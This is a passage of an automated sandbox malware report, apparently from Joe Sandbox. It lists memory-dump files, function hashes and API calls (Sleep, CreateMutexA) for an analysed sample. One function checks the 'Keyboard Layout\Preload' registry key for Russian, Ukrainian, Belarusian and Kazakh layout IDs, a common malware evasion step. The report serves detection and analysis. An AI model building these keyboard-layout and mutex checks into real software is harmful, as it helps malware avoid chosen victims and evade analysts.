Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2555d6d3a3fbbba4f6c2771b0a1928fee73dfdfe0cdd1cc9a4c762b505bf4f8c
Instruction ID: cd29ceaabd6a53f9f84b31663ec044ace259d9702c323fb40682c3edaa4d4a02
Opcode Fuzzy Hash: 2555d6d3a3fbbba4f6c2771b0a1928fee73dfdfe0cdd1cc9a4c762b505bf4f8c
Instruction Fuzzy Hash: 7CE0CD30482108EFCF257B59CC05D483B1AEF52749F495818FD0447127CB35FD41D960

Function 04CD038E Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107757704.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cd0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6646f0b44f59705335b54d34f6152b721581773ba8f56da82337a3b5005598a
Instruction ID: b8dca42bfd1f4b624185eecb8b8e86feb49a99ed6f16218c0ebbbdfc12f27783
Opcode Fuzzy Hash: e6646f0b44f59705335b54d34f6152b721581773ba8f56da82337a3b5005598a
Instruction Fuzzy Hash: 1EF046EB24D1207D7081918B3B14EFB675EE0C2A34735C82BF902C1042F6A99A493032

Function 00D75C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00D760FA
0000043f, xrefs: 00D7612B
00000419, xrefs: 00D76098
00000422, xrefs: 00D760C9
Keyboard Layout\Preload, xrefs: 00D76054

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: e0c7f6011ee2b36d605a16768efe85e74a1889828ee21b63c0287c3a00d453b6
Instruction ID: 246d26a79f55849972311ef8b1fd122fbd5fb11124d4d540a2d51669efa5a5ce
Opcode Fuzzy Hash: e0c7f6011ee2b36d605a16768efe85e74a1889828ee21b63c0287c3a00d453b6
Instruction Fuzzy Hash: E7F1D47090025C9FEB24DF58CC85BDEBBB9EF44304F508199F509A72C1EB759A84CBA5

Function 00D79BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 50ec37e590f2bc22257e4b16b1bcf9fd72fbe251667dc3e84dec01a8acd40814
Instruction ID: 7972e6269ae8e0cc7c1e71310daefced89f48aa1a6805b49ba229f1b35c193dd
Opcode Fuzzy Hash: 50ec37e590f2bc22257e4b16b1bcf9fd72fbe251667dc3e84dec01a8acd40814
Instruction Fuzzy Hash: 10312772A042048BEF08AB7CDC85B5DFBA2EBC5314F248219E418D73D5E77599908B72

Function 00D79F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ade758128c9d1bbff5c0e7ad465061d6c5d80dd660ca197fe66cf599e326d3c8
Instruction ID: c7c19a8c37e96b078731318847f8fbfdcb133934444e4fd26c89535195a00a1c
Opcode Fuzzy Hash: ade758128c9d1bbff5c0e7ad465061d6c5d80dd660ca197fe66cf599e326d3c8
Instruction Fuzzy Hash: 1B3148316042048BEB089B7CDC9576CF7A2EFC5310F248619E518D73D5E77599908772

Function 00D7A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D7A963
CreateMutexA.KERNEL32(00000000,00000000,00DD3254), ref: 00D7A981

Memory Dump Source

Source File: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true

Associated: 00000000.00000002.2105569511.0000000000D70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105586602.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105646406.0000000000DD9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105663731.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105682169.0000000000DE5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105698429.0000000000DE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105714881.0000000000DE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105813544.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105833222.0000000000F3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105888900.0000000000F67000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105904997.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105921179.0000000000F6B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105936485.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105957705.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105977685.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105998213.0000000000F8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106013899.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106031477.0000000000F96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106054538.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106080073.0000000000FC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106096996.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106112679.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106132892.0000000000FCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106152353.0000000000FCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106171327.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106188633.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106205820.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106226415.0000000000FDF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106242949.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106264393.0000000000FEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106281432.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106297488.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106314938.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106332734.0000000000FF4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106354979.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106372557.0000000001002000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106389176.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106429895.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106452370.0000000001028000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.0000000001029000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106470198.000000000104C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106524909.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106541217.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106558468.000000000107F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106576586.0000000001081000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106598192.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2106615934.0000000001091000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9d2ec9289a2745463c7ec1e186bd8a9147d4b4bb7216f6a675c21bbca378a326
